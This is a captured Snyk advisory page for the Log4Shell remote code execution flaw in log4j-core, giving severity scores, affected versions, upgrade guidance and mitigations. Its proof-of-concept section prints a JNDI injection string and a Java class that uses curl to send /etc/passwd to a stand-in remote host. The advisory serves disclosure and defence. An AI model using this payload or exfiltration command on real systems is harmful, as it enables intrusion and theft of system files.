security.snyk.io Open in urlscan Pro
2600:1408:c400:385::ecd  Public Scan

Form analysis
0 forms found in the DOM

Text Content

Developer Tools
 * Snyk Learn
 * Snyk Advisor
 * Code Checker

About Snyk
 1. Snyk Vulnerability Database
 2. Maven
 3. org.apache.logging.log4j:log4j-core




REMOTE CODE EXECUTION (RCE) AFFECTING ORG.APACHE.LOGGING.LOG4J:LOG4J-CORE
PACKAGE, VERSIONS [2.0-BETA9,2.3.1) [2.4,2.12.2) [2.13.0,2.15.0)

⚠️
The Log4Shell critical vulnerability is widespread and currently being exploited
in the wild. Fix this issue as soon as possible. See our blog for details.

--------------------------------------------------------------------------------

SEVERITY

Recommended
10.0
critical
0
10

CVSS ASSESSMENT MADE BY SNYK'S SECURITY TEAM

Learn more


THREAT INTELLIGENCE


Exploit Maturity
Mature
EPSS
96.98% (100th percentile)

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components
are vulnerable in your application, and suggest you quick fixes.

Test your applications

Snyk Learn

Learn about Remote Code Execution (RCE) vulnerabilities in an interactive
lesson.

Start learning
 * Snyk ID SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2314720
 * published 10 Dec 2021
 * disclosed 10 Dec 2021
 * credit Chen Zhaojun of Alibaba Cloud Security Team

Report a new vulnerability Found a mistake?

INTRODUCED: 10 DEC 2021

CVE-2021-44228 Open this link in a new tab

CWE-94 Open this link in a new tab

Share



HOW TO FIX?

Upgrade org.apache.logging.log4j:log4j-core to version 2.3.1, 2.12.2, 2.15.0 or
higher.

Use this guide to scan your projects for the Log4Shell vulnerability.


OVERVIEW

org.apache.logging.log4j:log4j-core is a logging library for Java.

Affected versions of this package are vulnerable to Remote Code Execution (RCE).
Apache Log4j2 JNDI features used in configuration, log messages, and parameters
do not protect against attacker controlled LDAP and other JNDI related
endpoints. An attacker who can control log messages or log message parameters
can execute arbitrary code loaded from LDAP servers when message lookup
substitution is enabled.

From log4j 2.15.0, JNDI LDAP endpoints are restricted to localhost by default.


POC

When an application uses log4j to log user input, an attacker can exploit this
vulnerability, by supplying a malicious string that the application logs - for
example, ${jndi:ldap://someurl/Evil}. This causes the application to execute a
malicious class supplied by an attacker’s LDAP server (someurl/Evil in this
example).

For example, the vulnerability can be used to inject this malicious class into
an application:

public class Evil implements ObjectFactory  {
   @Override
   public Object getObjectInstance (Object obj, Name name, Context nameCtx, Hashtable<?, ?> environment)  throws Exception {
       Runtime.getRuntime().exec("curl -F 'file=@/etc/passw‍đ' https://someurl/upload");
       return  null;
   }
}


This causes the application to disclose the etc/passwd file on the system, and
send it to a remote attacker.


FURTHER REMEDIATION OPTIONS

If upgrading the version is not possible, we strongly recommend to mitigate the
vulnerability using one of these methods:

 * Remove JndiLookup.class from the class path (i.e: zip -q -d log4j-core-*.jar
   org/apache/logging/log4j/core/lookup/JndiLookup.class. While not pertinent to
   log4shell, consider also removing JndiManager, JMSAppender and SMTPAppender
   if you are not using them, as there are unconfirmed reports they could be
   leveraged in similar attacks in the future.
 * Partial mitigation: disable lookups via system properties or environmental
   variables. If you use log4j >=2.10.0, you can set the system property
   LOG4J_FORMAT_MSG_NO_LOOKUPS or the environmental variable
   Dlog4j2.formatMsgNoLookups to true. (RCE is possible in some non-default
   Pattern Layout configurations that use a Context Lookup or a Thread Context
   Map pattern.)


Upgrading your JDK versions is not enough to mitigate this vulnerability in all
circumstances, as it was proven that setting the
com.sun.jndi.ldap.object.trustURLCodebase property to false is not enough.
For more remediation advice, please visit the Log4j Remediation Cheat Sheet
post.

Note: org.apache.logging.log4j:log4j-api was originally deemed vulnerable, but
Apache maintainers have since clarified that this only affects
org.apache.logging.log4j:log4j-core.


REFERENCES

 * Apache Jira Issues

 * Apache Jira Issues

 * Apache Security Advisory

 * GitHub PR

 * PoC

 * Snyk Blog and Vulnerability Breakdown

 * Exploit DB

 * CISA - Known Exploited Vulnerabilities

 * Nuclei Templates


CVSS SCORES

version 3.1
Expand this section


SNYK

10 critical
 * Attack Vector (AV)
   Network
 * Attack Complexity (AC)
   Low
 * Privileges Required (PR)
   None
 * User Interaction (UI)
   None

 * Scope (S)
   Changed

 * Confidentiality (C)
   High
 * Integrity (I)
   High
 * Availability (A)
   High

Expand this section


NVD

10 critical
Expand this section


RED HAT

9.8 critical


PRODUCT

 * Snyk Open Source
 * Snyk Code
 * Snyk Container
 * Snyk Infrastructure as Code
 * Test with Github
 * Test with CLI


RESOURCES

 * Vulnerability DB
 * Documentation
 * Disclosed Vulnerabilities
 * Blog
 * FAQs


COMPANY

 * About
 * Jobs
 * Contact
 * Policies
 * Do Not Sell My Personal Information


CONTACT US

 * Support
 * Report a new vuln
 * Press Kit
 * Events


FIND US ONLINE

 * 
 * 
 * 
 * 


TRACK OUR DEVELOPMENT

 * 
 * 



© 2024 Snyk Limited

Registered in England and Wales. Company number: 09677925

Registered address: Highlands House, Basingstoke Road, Spencers Wood, Reading,
Berkshire, RG7 1NT.